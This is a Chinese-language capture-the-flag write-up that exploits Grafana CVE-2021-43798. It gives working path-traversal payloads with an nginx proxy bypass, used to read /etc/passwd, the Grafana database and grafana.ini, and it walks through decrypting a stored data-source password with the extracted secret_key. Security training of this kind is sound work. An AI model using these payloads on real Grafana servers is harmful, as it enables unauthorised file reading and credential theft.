打开发现是grafana的登录界面,下面有对应的版本号,直接网上搜一搜有无对应的CVE
找到了 CVE-2021-43798 ,存在任意文件读取漏洞
网站做了nginx的反代,直接用现有的payload访问会报400的错误
构造
/public/plugins/text/#/../../../../../../../../../../etc/passwd
可实现任意文件读取
但更目录没有flag,环境变量文件也是空的,但是可以读取数据库文件和配置文件
/public/plugins/text/#/../../../../../../../../../../var/lib/grafana/grafana.db
读取下载得到数据库文件
使用navicat打开
但也没有找到flag
尝试使用工具解密数据库文件中的内容
工具 https://github.com/jas502n/Grafana-CVE-2021-43798
读取 配置文件
/public/plugins/text/#/../../../../../../../../../../etc/grafana/grafana.ini
得到 secret_key
secret_key = SW2YcwTIb9zpO1hoPsMm
得到的数据库文件中找到data_source的密码
得到 dataSourcePassword
{"password":"b0NXeVJoSXKPoSYIWt8i/GfPreRT03fO6gbMhzkPefodqe1nvGpdSROTvfHK1I3kzZy9SQnuVy9c3lVkvbyJcqRwNT6/"}
解密mysql 数据库密码得到flag